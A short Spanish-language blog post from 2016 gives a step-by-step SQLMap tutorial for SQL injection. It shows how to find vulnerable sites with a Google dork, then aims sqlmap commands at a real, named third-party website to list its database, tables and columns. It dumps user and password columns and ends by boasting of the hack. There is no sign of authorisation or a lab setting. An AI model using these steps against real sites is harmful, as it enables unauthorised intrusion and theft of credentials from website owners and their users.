Saturday, February 20, 2016

SQL Injection con SQLMap en BackTrack 3

En este video les mostrare como hacer una inyección SQL.
  • Programa: SQLMap
  • Sistema Operativo: BackTrack 3
  • Virtualizado con: Virtual Box 5.0

Pasos a Seguir


  1. Primero debemos de buscar un sitio vulnerable. Usualmente estan en php y utilizan parametros. Una forma muy sencilla de encontrarlos es usando en google la busqueda de dorking siguiente: inurl:php?id=, de esta forma buscaremos todos los sitios que en la url sean de php y contengan el parámetro id. 
  2. En mi caso yo encontre el sitio: www.bible-history.com/subcat.php?id=22. 
  3. Esto es a pura prueba y error ya que no solo por tener ese parametro son vulnerables.
  4. Ahora en Backtrack3 corremos el siquiente comando: cd /pentest/database/sqlmap. Esto es para ir a la carpeta donde esta SQLMap.
  5. Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22. Aqui ponemos la url vulnerable.
  6. Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 --current-db. 
    1. Esto es para ver la base de datos actual.
    2. Tambien nos muestra el SGBD y la version de la base de datos utilizada.
    3. En este sitio la base de datos se llama "bible_history"
  7. Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 -D bible_history --tables.
    1. Esto es para ver todas las tablas de la base de datos actual. En mi caso la base de datos es bible_history.
  8. Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 -D bible_history -T tabla --columns.
    1. esto es para ver todas las columnas de esa tabla.
  9. Ahora el comando: ./sqlmap.py -u www.bible-history.com/subcat.php?id=22 -D bible_history -T tabla -C id,user,password --dump
    1. Esto es para seleccionar todas las columnas que querramos de esa tabla.
  10. Listo!!! Ya hackeamos toda la historia de la Biblia!!!